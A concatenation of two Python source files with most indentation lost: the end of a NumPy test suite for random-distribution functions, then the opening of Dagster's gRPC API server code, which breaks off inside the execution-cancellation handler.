assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
if __name__ == "__main__":
run_module_suite()
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
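# Tunables for the server:
# - EVENT_QUEUE_POLL_INTERVAL: seconds between polls of a run subprocess's event queue.
# - CLEANUP_TICK: seconds between orphaned-run checks in the cleanup thread.
# - STREAMING_CHUNK_SIZE: maximum number of bytes per chunk in streaming replies.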
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class RepositorySymbolsAndCodePointers:
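    """Container for the repository symbols and code pointers resolved from a
    LoadableTargetOrigin. ``load()`` imports the user code and may raise; callers that
    want lazy loading can defer calling it."""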
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
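    """Import the user code referenced by ``loadable_target_origin`` and return a
    LoadableRepositorySymbol for each repository it defines, or an empty list when no
    origin is provided."""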
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
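    """Build a dict mapping each repository name to a CodePointer derived from the origin's
    python file, package name, or module name (checked in that order)."""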
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
    # The loadable_target_origin is currently Noneable to support instantiating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
        # The client tells the server to shut down by calling ShutdownServer (or by failing
        # to send a heartbeat, at which point this event is set). The cleanup thread will
        # then set the server termination event once all current executions have finished,
        # which stops the server.
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._repository_symbols_and_code_pointers = RepositorySymbolsAndCodePointers(
loadable_target_origin
)
try:
self._repository_symbols_and_code_pointers.load()
except Exception:
if not lazy_load_user_code:
raise
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Run execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
sys.executable,
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
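        """Yield ``serialized_data`` as StreamingChunkEvents of at most STREAMING_CHUNK_SIZE
        bytes each, so that large payloads stay under the gRPC message size limits."""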
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except:
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except:
